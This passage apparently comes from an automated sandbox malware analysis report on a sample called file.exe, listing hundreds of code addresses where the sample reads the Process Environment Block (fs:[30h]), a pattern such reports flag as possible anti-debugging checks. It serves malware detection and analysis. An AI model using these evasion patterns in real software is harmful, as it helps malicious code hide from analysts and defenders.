                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01338158 mov eax, dword ptr fs:[00000030h]2_2_01338158
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01334144 mov eax, dword ptr fs:[00000030h]2_2_01334144
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01334144 mov eax, dword ptr fs:[00000030h]2_2_01334144
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01334144 mov ecx, dword ptr fs:[00000030h]2_2_01334144
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01334144 mov eax, dword ptr fs:[00000030h]2_2_01334144
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01334144 mov eax, dword ptr fs:[00000030h]2_2_01334144
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A6154 mov eax, dword ptr fs:[00000030h]2_2_012A6154
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A6154 mov eax, dword ptr fs:[00000030h]2_2_012A6154
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129C156 mov eax, dword ptr fs:[00000030h]2_2_0129C156
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E0185 mov eax, dword ptr fs:[00000030h]2_2_012E0185
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132019F mov eax, dword ptr fs:[00000030h]2_2_0132019F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132019F mov eax, dword ptr fs:[00000030h]2_2_0132019F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132019F mov eax, dword ptr fs:[00000030h]2_2_0132019F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132019F mov eax, dword ptr fs:[00000030h]2_2_0132019F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01344180 mov eax, dword ptr fs:[00000030h]2_2_01344180
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01344180 mov eax, dword ptr fs:[00000030h]2_2_01344180
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135C188 mov eax, dword ptr fs:[00000030h]2_2_0135C188
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135C188 mov eax, dword ptr fs:[00000030h]2_2_0135C188
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129A197 mov eax, dword ptr fs:[00000030h]2_2_0129A197
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129A197 mov eax, dword ptr fs:[00000030h]2_2_0129A197
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129A197 mov eax, dword ptr fs:[00000030h]2_2_0129A197
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013761E5 mov eax, dword ptr fs:[00000030h]2_2_013761E5
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D01F8 mov eax, dword ptr fs:[00000030h]2_2_012D01F8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E1D0 mov eax, dword ptr fs:[00000030h]2_2_0131E1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E1D0 mov eax, dword ptr fs:[00000030h]2_2_0131E1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0131E1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E1D0 mov eax, dword ptr fs:[00000030h]2_2_0131E1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E1D0 mov eax, dword ptr fs:[00000030h]2_2_0131E1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013661C3 mov eax, dword ptr fs:[00000030h]2_2_013661C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013661C3 mov eax, dword ptr fs:[00000030h]2_2_013661C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01336030 mov eax, dword ptr fs:[00000030h]2_2_01336030
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129A020 mov eax, dword ptr fs:[00000030h]2_2_0129A020
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129C020 mov eax, dword ptr fs:[00000030h]2_2_0129C020
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01324000 mov ecx, dword ptr fs:[00000030h]2_2_01324000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE016 mov eax, dword ptr fs:[00000030h]2_2_012BE016
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE016 mov eax, dword ptr fs:[00000030h]2_2_012BE016
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE016 mov eax, dword ptr fs:[00000030h]2_2_012BE016
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE016 mov eax, dword ptr fs:[00000030h]2_2_012BE016
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CC073 mov eax, dword ptr fs:[00000030h]2_2_012CC073
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01326050 mov eax, dword ptr fs:[00000030h]2_2_01326050
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A2050 mov eax, dword ptr fs:[00000030h]2_2_012A2050
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012980A0 mov eax, dword ptr fs:[00000030h]2_2_012980A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013660B8 mov eax, dword ptr fs:[00000030h]2_2_013660B8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013660B8 mov ecx, dword ptr fs:[00000030h]2_2_013660B8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013380A8 mov eax, dword ptr fs:[00000030h]2_2_013380A8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A208A mov eax, dword ptr fs:[00000030h]2_2_012A208A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A80E9 mov eax, dword ptr fs:[00000030h]2_2_012A80E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0129A0E3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013260E0 mov eax, dword ptr fs:[00000030h]2_2_013260E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129C0F0 mov eax, dword ptr fs:[00000030h]2_2_0129C0F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E20F0 mov ecx, dword ptr fs:[00000030h]2_2_012E20F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013220DE mov eax, dword ptr fs:[00000030h]2_2_013220DE
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01378324 mov eax, dword ptr fs:[00000030h]2_2_01378324
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01378324 mov ecx, dword ptr fs:[00000030h]2_2_01378324
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01378324 mov eax, dword ptr fs:[00000030h]2_2_01378324
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01378324 mov eax, dword ptr fs:[00000030h]2_2_01378324
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA30B mov eax, dword ptr fs:[00000030h]2_2_012DA30B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA30B mov eax, dword ptr fs:[00000030h]2_2_012DA30B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA30B mov eax, dword ptr fs:[00000030h]2_2_012DA30B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129C310 mov ecx, dword ptr fs:[00000030h]2_2_0129C310
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C0310 mov ecx, dword ptr fs:[00000030h]2_2_012C0310
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134437C mov eax, dword ptr fs:[00000030h]2_2_0134437C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136A352 mov eax, dword ptr fs:[00000030h]2_2_0136A352
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01348350 mov ecx, dword ptr fs:[00000030h]2_2_01348350
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132035C mov ecx, dword ptr fs:[00000030h]2_2_0132035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0137634F mov eax, dword ptr fs:[00000030h]2_2_0137634F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129E388 mov eax, dword ptr fs:[00000030h]2_2_0129E388
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129E388 mov eax, dword ptr fs:[00000030h]2_2_0129E388
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129E388 mov eax, dword ptr fs:[00000030h]2_2_0129E388
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C438F mov eax, dword ptr fs:[00000030h]2_2_012C438F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C438F mov eax, dword ptr fs:[00000030h]2_2_012C438F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01298397 mov eax, dword ptr fs:[00000030h]2_2_01298397
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01298397 mov eax, dword ptr fs:[00000030h]2_2_01298397
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01298397 mov eax, dword ptr fs:[00000030h]2_2_01298397
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D63FF mov eax, dword ptr fs:[00000030h]2_2_012D63FF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE3F0 mov eax, dword ptr fs:[00000030h]2_2_012BE3F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE3F0 mov eax, dword ptr fs:[00000030h]2_2_012BE3F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE3F0 mov eax, dword ptr fs:[00000030h]2_2_012BE3F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013443D4 mov eax, dword ptr fs:[00000030h]2_2_013443D4
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013443D4 mov eax, dword ptr fs:[00000030h]2_2_013443D4
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A83C0 mov eax, dword ptr fs:[00000030h]2_2_012A83C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A83C0 mov eax, dword ptr fs:[00000030h]2_2_012A83C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A83C0 mov eax, dword ptr fs:[00000030h]2_2_012A83C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A83C0 mov eax, dword ptr fs:[00000030h]2_2_012A83C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E3DB mov eax, dword ptr fs:[00000030h]2_2_0134E3DB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E3DB mov eax, dword ptr fs:[00000030h]2_2_0134E3DB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E3DB mov ecx, dword ptr fs:[00000030h]2_2_0134E3DB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E3DB mov eax, dword ptr fs:[00000030h]2_2_0134E3DB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013263C0 mov eax, dword ptr fs:[00000030h]2_2_013263C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135C3CD mov eax, dword ptr fs:[00000030h]2_2_0135C3CD
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129823B mov eax, dword ptr fs:[00000030h]2_2_0129823B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129826B mov eax, dword ptr fs:[00000030h]2_2_0129826B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A4260 mov eax, dword ptr fs:[00000030h]2_2_012A4260
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A4260 mov eax, dword ptr fs:[00000030h]2_2_012A4260
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A4260 mov eax, dword ptr fs:[00000030h]2_2_012A4260
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135A250 mov eax, dword ptr fs:[00000030h]2_2_0135A250
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135A250 mov eax, dword ptr fs:[00000030h]2_2_0135A250
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0137625D mov eax, dword ptr fs:[00000030h]2_2_0137625D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01328243 mov eax, dword ptr fs:[00000030h]2_2_01328243
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01328243 mov ecx, dword ptr fs:[00000030h]2_2_01328243
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A6259 mov eax, dword ptr fs:[00000030h]2_2_012A6259
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129A250 mov eax, dword ptr fs:[00000030h]2_2_0129A250
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B02A0 mov eax, dword ptr fs:[00000030h]2_2_012B02A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B02A0 mov eax, dword ptr fs:[00000030h]2_2_012B02A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013362A0 mov ecx, dword ptr fs:[00000030h]2_2_013362A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE284 mov eax, dword ptr fs:[00000030h]2_2_012DE284
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE284 mov eax, dword ptr fs:[00000030h]2_2_012DE284
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01320283 mov eax, dword ptr fs:[00000030h]2_2_01320283
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01320283 mov eax, dword ptr fs:[00000030h]2_2_01320283
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01320283 mov eax, dword ptr fs:[00000030h]2_2_01320283
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B02E1 mov eax, dword ptr fs:[00000030h]2_2_012B02E1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B02E1 mov eax, dword ptr fs:[00000030h]2_2_012B02E1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B02E1 mov eax, dword ptr fs:[00000030h]2_2_012B02E1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013762D6 mov eax, dword ptr fs:[00000030h]2_2_013762D6
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01336500 mov eax, dword ptr fs:[00000030h]2_2_01336500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D656A mov eax, dword ptr fs:[00000030h]2_2_012D656A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D656A mov eax, dword ptr fs:[00000030h]2_2_012D656A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D656A mov eax, dword ptr fs:[00000030h]2_2_012D656A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A8550 mov eax, dword ptr fs:[00000030h]2_2_012A8550
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A8550 mov eax, dword ptr fs:[00000030h]2_2_012A8550
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013205A7 mov eax, dword ptr fs:[00000030h]2_2_013205A7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013205A7 mov eax, dword ptr fs:[00000030h]2_2_013205A7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013205A7 mov eax, dword ptr fs:[00000030h]2_2_013205A7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C45B1 mov eax, dword ptr fs:[00000030h]2_2_012C45B1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C45B1 mov eax, dword ptr fs:[00000030h]2_2_012C45B1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D4588 mov eax, dword ptr fs:[00000030h]2_2_012D4588
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A2582 mov eax, dword ptr fs:[00000030h]2_2_012A2582
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A2582 mov ecx, dword ptr fs:[00000030h]2_2_012A2582
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE59C mov eax, dword ptr fs:[00000030h]2_2_012DE59C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DC5ED mov eax, dword ptr fs:[00000030h]2_2_012DC5ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DC5ED mov eax, dword ptr fs:[00000030h]2_2_012DC5ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A25E0 mov eax, dword ptr fs:[00000030h]2_2_012A25E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE5CF mov eax, dword ptr fs:[00000030h]2_2_012DE5CF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE5CF mov eax, dword ptr fs:[00000030h]2_2_012DE5CF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A65D0 mov eax, dword ptr fs:[00000030h]2_2_012A65D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA5D0 mov eax, dword ptr fs:[00000030h]2_2_012DA5D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA5D0 mov eax, dword ptr fs:[00000030h]2_2_012DA5D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129E420 mov eax, dword ptr fs:[00000030h]2_2_0129E420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129E420 mov eax, dword ptr fs:[00000030h]2_2_0129E420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129E420 mov eax, dword ptr fs:[00000030h]2_2_0129E420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129C427 mov eax, dword ptr fs:[00000030h]2_2_0129C427
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
